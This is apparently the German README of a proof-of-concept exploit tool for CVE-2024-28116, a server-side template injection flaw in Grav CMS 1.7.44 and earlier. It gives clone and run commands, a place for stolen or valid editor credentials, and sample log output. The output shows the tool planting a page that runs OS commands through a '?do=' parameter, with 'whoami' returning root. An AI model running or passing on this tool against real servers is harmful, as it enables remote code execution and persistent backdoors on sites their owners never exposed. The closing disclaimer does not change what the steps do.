
ist ein PoC Python-Skript, das eine authentifizierte Server-Side Template Injection (SSTI)-Schwachstelle in Grav CMS Versionen <= 1.7.44 (CVE-2024-28116) ausnutzt.
GenGravSSTIExploit ist ein PoC-Python-Skript, das eine authentifizierte Server-Side Template Injection (SSTI)-Schwachstelle in Grav CMS Versionen <= 1.7.44 (CVE-2024-28116) ausnutzt. Diese Schwachstelle ermöglicht es einem Benutzer mit Editor-Berechtigungen, OS-Befehle auf einem entfernten Server auszuführen.
Hinweis: Dieses Skript benötigt gültige Anmeldedaten, um sich in der Grav CMS-Konsole zu authentifizieren.
requests (installieren mit pip install requests)Repository klonen
git clone https://github.com/geniuszly/GenGravSSTIExploit
cd GenGravSSTIExploit
Anmeldedaten konfigurieren
Bearbeiten Sie das Skript, um Ihre Grav CMS-Editor-Anmeldedaten einzutragen:
GRAV_USER = "youruser"
GRAV_PASSWORD = "yourpassword"
Skript ausführen
Verwenden Sie den folgenden Befehl, um das Skript auszuführen:
python GenGravSSTIExploit.py -t <TARGET_URL> -p <PORT>
<TARGET_URL>: Ziel-URL im Format http[s]://hostname.<PORT>: Portnummer (Standard ist 80).Beispiel:
python GenGravSSTIExploit.py -t http://example.com -p 8080
Mit dem Exploit interagieren
Wenn der Exploit erfolgreich ist, erhalten Sie eine URL, unter der Sie OS-Befehle ausführen können:
[+] RCE-Payload injiziert. Besuchen Sie die bösartige Seite: http://example.com:8080/poc_<ID>?do=<command>
python GenGravSSTIExploit.py -t http://example.com -p 8080
Das Skript führt jeden Schritt aus und gibt Ihnen über das Terminal Updates. Hier ist, was Sie sehen könnten:
2024-10-02 12:00:01 - INFO - Überprüfe Ziel-URL...
2024-10-02 12:00:02 - INFO - H hole session cookie und login-nonce...
2024-10-02 12:00:03 - INFO - Versuche Authentifizierung in Grav CMS...
2024-10-02 12:00:04 - INFO - Zugriff auf Admin-Panel nach Authentifizierung...
2024-10-02 12:00:05 - INFO - Erstelle neue Seite...
2024-10-02 12:00:06 - INFO - H hole form-nonce und unique_form_id...
2024-10-02 12:00:07 - INFO - Injiziere RCE-Payload...
2024-10-02 12:00:08 - INFO - [+] RCE-Injektion erfolgreich. Besuchen Sie den Link: http://example.com:8080/poc_4T7B?do=<command>
Nach Abschluss des Skripts sehen Sie eine Meldung mit dem Link zur injizierten Seite. Sie können diesen Link besuchen, um OS-Befehle auszuführen:
http://example.com:8080/poc_4T7B?do=whoami
Der Besuch der URL mit dem angegebenen Befehl zeigt die Ausgabe direkt auf der Seite an:
Cmd-Output:
root
Dieses Tool ist nur für Bildungszwecke bestimmt. Verwenden Sie es verantwortungsvoll und nur auf Systemen, für die Sie eine ausdrückliche Erlaubnis haben. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Skript verursacht werden.